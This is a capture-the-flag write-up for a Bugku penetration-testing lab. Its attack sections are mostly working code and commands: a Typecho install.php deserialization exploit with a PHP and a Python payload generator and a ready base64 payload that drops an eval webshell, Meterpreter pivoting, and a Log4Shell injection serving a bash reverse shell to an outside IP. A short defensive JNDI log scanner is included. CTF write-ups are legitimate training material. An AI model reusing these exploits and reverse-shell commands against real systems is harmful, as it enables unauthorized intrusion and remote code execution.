Bugku PAR: Penetration Test 2
Penetration Test 2 (unsolved)
Number of flags: 9
Description: During a penetration test, Xiao Ming got into a website's admin backend but ran out of ideas on how to go further. Can you help?
Starting point: a single address, http://106.14.195.228:80

The site exposes its .git directory (source code disclosure), so the repository can be pulled with GitHack:

C:\Users\25963\Desktop\GitHack-master>python GitHack.py -u http://106.14.195.228/.git/
[+] Download and parse index file ...
[+] LICENSE
[+] README.md
[+] index.php
[+] logo.png
[+] phpinfo.php
[OK] README.md
[OK] LICENSE
[OK] phpinfo.php
[OK] index.php
[OK] logo.png
Directory scan results:
[02:27:19] 301 - 314B - /.git -> http://106.14.195.228/.git/
[02:27:19] 200 - 599B - /.git/
[02:27:19] 200 - 272B - /.git/config
[02:27:19] 200 - 23B - /.git/HEAD
[02:27:19] 200 - 413B - /.git/branches/
[02:27:19] 200 - 73B - /.git/description
[02:27:19] 200 - 595B - /.git/hooks/
[02:27:19] 200 - 400B - /.git/index
[02:27:19] 200 - 240B - /.git/info/exclude
[02:27:19] 200 - 459B - /.git/info/
[02:27:19] 200 - 191B - /.git/logs/HEAD
[02:27:19] 200 - 481B - /.git/logs/
[02:27:19] 301 - 324B - /.git/logs/refs -> http://106.14.195.228/.git/logs/refs/
[02:27:19] 301 - 330B - /.git/logs/refs/heads -> http://106.14.195.228/.git/logs/refs/heads/
[02:27:19] 200 - 191B - /.git/logs/refs/heads/master
[02:27:19] 301 - 332B - /.git/logs/refs/remotes -> http://106.14.195.228/.git/logs/refs/remotes/
[02:27:19] 200 - 191B - /.git/logs/refs/remotes/origin/HEAD
[02:27:19] 200 - 107B - /.git/packed-refs
[02:27:19] 200 - 543B - /.git/objects/
[02:27:19] 301 - 325B - /.git/refs/heads -> http://106.14.195.228/.git/refs/heads/
[02:27:19] 200 - 41B - /.git/refs/heads/master
[02:27:19] 301 - 327B - /.git/refs/remotes -> http://106.14.195.228/.git/refs/remotes/
[02:27:19] 301 - 334B - /.git/refs/remotes/origin -> http://106.14.195.228/.git/refs/remotes/origin/
[02:27:19] 200 - 32B - /.git/refs/remotes/origin/HEAD
[02:27:19] 301 - 324B - /.git/refs/tags -> http://106.14.195.228/.git/refs/tags/
[02:27:19] 200 - 473B - /.git/refs/
[02:27:26] 301 - 315B - /admin -> http://106.14.195.228/admin/
[02:27:26] 302 - 0B - /admin/ -> http://106.14.195.228/admin/login.php?referer=http%3A%2F%2F106.14.195.228%2Fadmin%2F
[02:27:26] 200 - 0B - /admin/config.php
[02:27:27] 302 - 0B - /admin/index.php -> http://106.14.195.228/admin/login.php?referer=http%3A%2F%2F106.14.195.228%2Fadmin%2Findex.php
[02:27:27] 200 - 2KB - /admin/login.php
[02:27:38] 200 - 0B - /config.inc.php
[02:27:48] 301 - 317B - /install -> http://106.14.195.228/install/
[02:27:48] 200 - 0B - /install.php
[02:27:48] 200 - 0B - /install.php?profile=default
[02:27:48] 200 - 530B - /install/
[02:27:50] 200 - 10KB - /LICENSE
[02:27:50] 200 - 6KB - /license
[02:27:50] 200 - 6KB - /license.txt
[02:27:51] 200 - 14KB - /logo
[02:27:57] 200 - 18KB - /phpinfo.php
[02:28:01] 200 - 79B - /README.md
[02:28:12] 301 - 313B - /usr -> http://106.14.195.228/usr/
[02:28:12] 200 - 484B - /usr/
[02:28:12] 301 - 313B - /var -> http://106.14.195.228/var/
[02:28:12] 200 - 618B - /var/
Admin backend: /admin/

The site runs Typecho 1.0, which has the install.php deserialization bug (CVE-2018-18753). With ?finish set, install.php base64-decodes and unserialize()s the __typecho_config value (read from the cookie, falling back to POST) and hands $config['adapter'] to the Typecho_Db constructor, which concatenates it into a class name. That string conversion invokes Typecho_Feed::__toString(); its RSS 2.0 branch reads $item['author']->screenName, and Typecho_Request::__get() passes that value through every entry of its _filter list with call_user_func(), so a filter of 'system' executes screenName as a shell command. Note that install.php bails out unless the request carries a Referer header whose host matches the Host header.

exp (run with the PHP CLI; it prints the base64-encoded payload):
<?php
// Stand-ins for the two Typecho classes. Only the property names and their visibility matter,
// because serialize() writes private properties as "\0ClassName\0prop".
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;
    public function __construct(){
        // RSS 2.0 is the __toString() branch that touches $item['author']->screenName
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'link' => '1',
            'date' => 1508895132,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();
    public function __construct(){
        // __get('screenName') returns _params['screenName'] after running it through
        // each entry of _filter with call_user_func(), i.e. system('echo ... > 1.php')
        $this->_params['screenName'] = 'echo "<?php @eval(\$_POST[1]);?>" > 1.php';
        $this->_filter[0] = 'system';
    }
}
$exp = array(
    'adapter' => new Typecho_Feed(),   // concatenated into a class name by Typecho_Db, triggering __toString()
    'prefix' => 'typecho_'
);
echo base64_encode(serialize($exp));
?>
Output (the base64 payload):
YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjQxOiJlY2hvICI8P3BocCBAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiAxLnBocCI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjQxOiJlY2hvICI8P3BocCBAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiAxLnBocCI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=
GET: http://47.102.44.129/install.php?finish=a
POST body:
__typecho_config=<the base64 string printed by the exp above>
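The same gadget chain built in Python, as an added example that is not code from this writeup or from Typecho: a minimal PHP serializer that reproduces the private-property name mangling, the payload builder, and the shape of the delivering request. It reproduces the exact base64 string the PHP exp prints. The Referer requirement and the POST fallback for __typecho_config come from the vulnerable install.php; the target host 106.14.195.228 and the Referer path are assumptions for the demonstration.

```python
import base64
import urllib.parse

CMD = 'echo "<?php @eval(\\$_POST[1]);?>" > 1.php'  # same command as the PHP exp


class PHPObject:
    """A PHP object to serialize: class name plus ordered (name, visibility, value) properties."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def _mangle(cls, name, visibility):
    # serialize() prefixes private props with "\0Class\0" and protected ones with "\0*\0".
    if visibility == "private":
        return "\0" + cls + "\0" + name
    if visibility == "protected":
        return "\0*\0" + name
    return name


def php_serialize(value):
    """Subset of PHP serialize(): bool, int, str/bytes, list, dict and PHPObject."""
    if isinstance(value, bool):
        return b"b:1;" if value else b"b:0;"
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, str):
        value = value.encode()
    if isinstance(value, bytes):
        return b's:%d:"%s";' % (len(value), value)  # length is in bytes, not characters
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    if isinstance(value, PHPObject):
        body = b"".join(
            php_serialize(_mangle(value.cls, n, vis)) + php_serialize(v) for n, vis, v in value.props
        )
        return b'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls.encode(), len(value.props), body)
    raise TypeError(f"unsupported type {type(value).__name__}")


def typecho_request(cmd):
    # Typecho_Request::__get('screenName') runs _params['screenName'] through each _filter via call_user_func()
    return PHPObject("Typecho_Request", [
        ("_params", "private", {"screenName": cmd}),
        ("_filter", "private", ["system"]),
    ])


def build_payload(cmd=CMD):
    """Base64 of the serialized $config array that install.php?finish= feeds to new Typecho_Db()."""
    feed = PHPObject("Typecho_Feed", [
        ("_type", "private", "RSS 2.0"),  # the __toString() branch that reads $item['author']->screenName
        ("_items", "private", [{
            "title": "1",
            "link": "1",
            "date": 1508895132,
            "category": [typecho_request(cmd)],
            "author": typecho_request(cmd),
        }]),
    ])
    config = {"adapter": feed, "prefix": "typecho_"}  # 'adapter' is string-concatenated -> __toString()
    return base64.b64encode(php_serialize(config)).decode()


def install_request(host, payload_b64):
    """Shape of the delivering request (assumed host). install.php exits unless the Referer host equals
    the Host header, and Typecho_Cookie::get() falls back to $_POST, so the payload can travel in the body."""
    return {
        "method": "POST",
        "url": f"http://{host}/install.php?finish=a",
        "headers": {
            "Referer": f"http://{host}/install.php",
            "Content-Type": "application/x-www-form-urlencoded",
        },
        # base64 contains '+' and '=', which must be percent-encoded or PHP turns '+' into a space
        "body": "__typecho_config=" + urllib.parse.quote(payload_b64, safe=""),
    }


if __name__ == "__main__":
    req = install_request("106.14.195.228", build_payload())
    print(req["url"])
    print(req["body"])
```

The serializer is the part worth keeping: any other PHP unserialize() chain is just a different PHPObject tree, and getting the "\0Class\0" prefix and the byte length of each string right is what usually breaks hand-built payloads.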

flag1, found in the web root: flag{e0d9924caeecfabdb07b9c90fb60e959}

The MySQL database uses weak credentials.


flag2: flag{aa5c89083bd3836e7c86ef0a2d8681fa}
The database also yields the backend admin credentials admin / $P$BfY8rUZyXxJy5AeWCVphCYzYR3tZ9I1. The $P$ prefix marks a phpass portable hash (hashcat mode 400), which Typecho accepts for logins; I didn't look up the scheme at the time, and since this host already has a shell I left it alone. Upload fscan and scan the /24:
192.168.0.2:3306 open
192.168.0.2:80 open
[*] WebTitle: http://192.168.0.2 code:200 len:3392 title:Harry's Blog
[+] mysql:192.168.0.2:3306:root
192.168.0.2:3306 open
192.168.0.3:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.1:22 open
[*] WebTitle: http://192.168.0.1 code:200 len:3392 title:Harry's Blog
[*] WebTitle: http://192.168.0.2 code:200 len:3392 title:Harry's Blog
[*] WebTitle: http://192.168.0.3 code:200 len:4789 title:Bugku后台管理系统
[+] mysql:192.168.0.2:3306:root
Generate an msf payload and set up a pivot (socks proxy) through it.

Add a route to the internal subnet:
meterpreter > run autoroute -s 192.168.0.0
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.0.0/255.255.255.0...
[+] Added route to 192.168.0.0/255.255.255.0 via 106.14.195.228
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.0.0 255.255.255.0 Session 1
The proxy reaches 192.168.0.3.

Directory scanning found nothing of note.
One drawback of msf's socks proxy: it cannot take much traffic, or the session simply dies. Directory brute-forcing generates far too much traffic and breaks msf, so I switched to frp for the scan.
Capturing the login request shows a hint in the response: a Source: header.
Downloading that source shows the application is written in Java.

Log4j2CtfApplication.java
package com.example.log4j2ctf;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class Log4j2CtfApplication {
public static void main(String[] args) {
SpringApplication.run(Log4j2CtfApplication.class, args);
}
}
DamnVulnerableLog4j.java
package com.example.log4j2ctf.controller;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
import javax.servlet.http.HttpServletResponse;
@RestController
public class DamnVulnerableLog4j {
    private final Logger logger = LoggerFactory.getLogger(this.getClass());
    private int count = 0;
    @PostMapping("/login")
    public String login(String user, String pwd, HttpServletResponse response) {
        // the hint seen in the captured response
        response.addHeader("Source", "/source.zip");
        /*
         *
         *
         */
        // attacker-controlled 'user' is interpolated into a Log4j 2 message, so lookups such as ${jndi:...} get evaluated
        logger.info("用户登录失败,用户名不存在:" + user);
        return "用户名或密码错误,次数 " + (count++);
    }
}
The file name makes it obvious: this is the Log4j2 JNDI lookup vulnerability (Log4Shell, CVE-2021-44228).

The username is written straight into a log4j2 message, so a ${jndi:...} lookup (rmi:// or ldap://) can be injected through that field; the bundled dependencies show the app is built on Spring Boot.

Start a JNDI injection server that serves the reverse-shell command (the base64 decodes to bash -i >& /dev/tcp/81.70.241.211/6666 0>&1):

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS43MC4yNDEuMjExLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "81.70.241.211"

then submit the generated RMI reference as the username:

${jndi:rmi://81.70.241.211:1099/igsfwb}
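On the detection side, as an added example that is not part of this writeup: a small Python scanner for the JNDI lookup in log lines. It first folds the ${lower:}, ${upper:} and ${name:key:-default} forms attackers use to hide the string, so obfuscated variants are caught too. The sample log lines are constructed here to mimic the controller's message format; the set of lookup names whose default form is folded is an assumption.

```python
import re

# Innermost ${...}: a body with no further "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# Lookup names whose "${name:key:-default}" form yields the default when the key is unset.
# Assumed list of Log4j 2 lookups; extend as needed.
_DEFAULTABLE = {"", "env", "sys", "date", "ctx", "main", "java", "log4j", "bundle",
                "k8s", "spring", "sd", "map", "event", "marker"}

_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _fold(body):
    """Constant that a pure string-building lookup evaluates to, or None if it is a real lookup."""
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        head, default = body.split(":-", 1)
        if head.split(":", 1)[0].lower() in _DEFAULTABLE:
            return default
    return None


def normalize(line, max_rounds=32):
    """Repeatedly replace innermost foldable lookups so nested obfuscation collapses to its plain form."""
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            folded = _fold(match.group(1))
            if folded is None:
                return match.group(0)
            changed = True
            return folded

        line = _INNER.sub(repl, line)
        if not changed:
            break
    return line


def is_jndi_injection(line):
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1) if is_jndi_injection(line)]


# Constructed sample log lines in the format of the controller's logger.info() call.
SAMPLE_LOG = [
    "INFO 用户登录失败,用户名不存在:alice",
    "INFO 用户登录失败,用户名不存在:${jndi:rmi://81.70.241.211:1099/igsfwb}",
    "INFO 用户登录失败,用户名不存在:${${lower:j}${upper:n}di:ldap://81.70.241.211:1389/a}",
    "INFO 用户登录失败,用户名不存在:${${::-j}${::-n}di:rmi://81.70.241.211:1099/igsfwb}",
    "INFO 用户登录失败,用户名不存在:${${env:NaN:-j}ndi:${lower:LDAP}://81.70.241.211:1389/x}",
    "INFO 用户登录失败,用户名不存在:${date:yyyy-MM-dd}_bob",
]

if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG):
        print(f"line {n}: {hit}")
```

Run it over the application log (or the access log, since the same string also shows up in request bodies when they are logged); a plain grep for "${jndi:" misses every line except the second one.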


flag4:flag{a98b304c5ce272cd586da15874ef4e79}
/root/flag
flag5:flag{2a57c5c9e6b970f674b33b574ee30db5}

/proc/self/environ
flag3:flag{e0f92293345ebeb6687d93341afcf402}

The host is multi-homed, so there is another subnet behind it:
root@44e217274d66:/# ip add
ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
9: eth0@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c0:a8:00:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.168.0.3/24 brd 192.168.0.255 scope global eth0
valid_lft forever preferred_lft forever
15: eth1@if16: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c0:a8:01:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.168.1.2/24 brd 192.168.1.255 scope global eth1
valid_lft forever preferred_lft forever
First, get an msf shell on this host.

Then add a route to the new subnet.

The server is too weak: its memory got exhausted. I'll pick this up another time.